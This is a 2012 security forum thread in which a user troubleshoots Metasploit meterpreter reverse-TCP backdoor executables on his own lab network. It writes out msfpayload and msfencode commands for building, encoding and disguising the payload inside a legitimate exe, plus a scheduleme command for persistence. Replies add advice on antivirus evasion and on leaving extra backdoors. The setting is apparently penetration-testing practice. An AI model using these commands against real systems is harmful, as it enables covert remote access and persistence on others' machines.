.

Windows not opening backdoor exe

<<

JohnUofU

Newbie
Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 1:49 am

Windows not opening backdoor exe

Problem: 
I'm creating a payload, encoding it, moving to a Windows 7 machine, and Windows will not open the exe I've created.

Process:
I started with a simple payload, here is the what I used...
  Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 x > /root/backdoor.exe

It works.  It gets made, sent, and I get a meterpreter connection.  My problem with it, however, is that it lights up pretty much every AV it could run into.  So I decided to try encoding it to see what happens...
  Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 R| msfencode -c 5 -e x86/shikata_ga_nai -x > /root/EncodedBackdoor.exe

This works fine up to the point where windows tries to open it.  It says that the file isn't compatible with windows and it refuses to use it.  I've also tried hiding it in a legit windows exe, but that hasn't worked either.  And if I'm doing this part wrong please point that out too...
  Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=4444 R| msfencode -c 5 -e x86/shikata_ga_nai -x > /root/windows-software.exe -t exe > /root/HiddenBackdoor.exe

The "windows-software.exe" is the legit windows exe.  And hiding it within that file did not work either.  Same problem with it not opening.

I'm fairly confused about it.  I've spent a LOT of time checking out tutorials, reading forums, and watching videos, and everyone seems to follow the same steps, except NONE of them had this problem.

What I'm working with:
  My Machine:  HP Pavillion DM3Z with BackTrack 5R1
  Target:  HP Laptop... but it's running Windows 7

PS:  Both machines are mine on my network.
<<

millwalll

Post Sat Jan 28, 2012 8:11 am

Re: Windows not opening backdoor exe

Hmm I would try playing around with the encode a bit more to see if you change it makes any difference. It also could be the AV maybe the encode has not change the signature enough and the AV has it marked as bad so wont let you run it at all.


I am not expert but only things I can think off :P
<<

JohnUofU

Newbie
Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 4:43 pm

Re: Windows not opening backdoor exe

I could play around with encode more I suppose.  But I don't think its the AV stopping it.  Normally an AV will notify or at least have record of whats been flagged, but it doesn't with these files.  Thanks for a reply, hopefully looking for some more help if anyone can offer it.
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat Jan 28, 2012 7:20 pm

Re: Windows not opening backdoor exe

If I were to guess, the encoder likely used bad characters. You have to know (and exclude from use) bad characters, so the encoder won't use them.

Bad chars can cause all sorts of issues, like not running at all, or being detected as a non-Windows program, as you're running into.

So I'd agree on trying different / other encoding and / or looking at the characters to see if it used bad ones.
Last edited by hayabusa on Sat Jan 28, 2012 7:23 pm, edited 1 time in total.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

JohnUofU

Newbie
Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 7:22 pm

Re: Windows not opening backdoor exe

Got the file to open on the target PC with encoding.  It doesn't avoid the AV I want it to, but that isn't a big deal right now.  The major problem I have now is reestablishing a connection after I close a session.  I added a schedule for it to run every minute via "scheduleme", but that doesn't work, and I even tried manually running the .exe on the target PC, but that doesn't work either.  Here is my schedule code:

  Code:
run scheduleme -m 1 -u -e /root/hacker.exe


Any thoughts?

PS:  hayabusa, you posted while I was typing this, but you're correct, bad characters were most likely the problem and that issue was solved.

EDIT:  Ok, apparently now it will start a new session when I manually execute the file on the target...(wasn't doing it before)...but I'd still like it to automatically make a new connection, so my code is above that i tried to do that with...
Last edited by JohnUofU on Sat Jan 28, 2012 7:26 pm, edited 1 time in total.
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat Jan 28, 2012 7:26 pm

Re: Windows not opening backdoor exe

Sorry...  Would've replied earlier (and saved you some time,) but it's been a hectic day, here.

With regards to the schedule, you might need to toy with that more (or give us more detail.)  Most often, after exploit, services crash, or hang in a funky state.  Thus, I (and others) typically leave another backdoor, for future access, after exiting the initial session.

(Edit: that's obviously your intent, but I / we may need more info to determine why your scheduleme isn't working.  Could be a lot of issues - rights of the user running it vs. the scheduler, etc.  Hard telling, solely from the info given, at this point.)
Last edited by hayabusa on Sat Jan 28, 2012 7:36 pm, edited 1 time in total.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

JohnUofU

Newbie
Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 7:39 pm

Re: Windows not opening backdoor exe

No worries.  That makes sense that it would be left in a "funky state" haha.  It feels like that's what has been happening.  And leaving another backdoor is smart and definitely something I'll keep in mind on more serious tasks.

So the restarting sessions problem arose as I was on the forums, so I posted it immediately, but it turns out it was an easy fix.  The task was scheduled to only run when the computer was plugged in (and it wasn't).  It's working kind of hit and miss now.  Looks like it will just be an issue in the task properties that I will play around with.

Thanks for the quick reply.
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Sat Jan 28, 2012 7:46 pm

Re: Windows not opening backdoor exe

You're welcome!  Good luck, and keep pressing forward.  Always the most fun, for me, when I hit issues like yours, in testing.  I love challenges, and learn best that way, myself, most times.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Sat Jan 28, 2012 10:32 pm

Re: Windows not opening backdoor exe

A great writeup from Scriptjunkie awhile back that speaks to av evasion and metasploit payloads http://www.scriptjunkie.us/2011/04/why- ... ates-exes/

Basically, if you want to get around all AV dont use metasploit, write your own or just write code that can virtualalloc and execute shellcode :)

http://www.scriptjunkie.us/2011/04/why- ... ates-exes/
Last edited by cd1zz on Sat Jan 28, 2012 11:10 pm, edited 1 time in total.
<<

JohnUofU

Newbie
Newbie

Posts: 6

Joined: Sat Jan 28, 2012 1:45 am

Post Sat Jan 28, 2012 11:02 pm

Re: Windows not opening backdoor exe

I appreciate the links.  Very useful reading.  And I agree about making it yourself.  Its always the best way to do anything.  :)  im just working on basics until summer.  Then im gonna hit this stuff hard before I start my network security classes next fall.  Im also trying to work through my transition from windows to Linux.
<<

Triban

User avatar

Hero Member
Hero Member

Posts: 620

Joined: Fri Feb 19, 2010 4:17 pm

Post Mon Jan 30, 2012 3:20 pm

Re: Windows not opening backdoor exe

not to hijack the thread...

Did you try buying it dinner first?  Maybe cuddle? :D
Certs: GCWN
(@)Dewser

Return to Malware

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software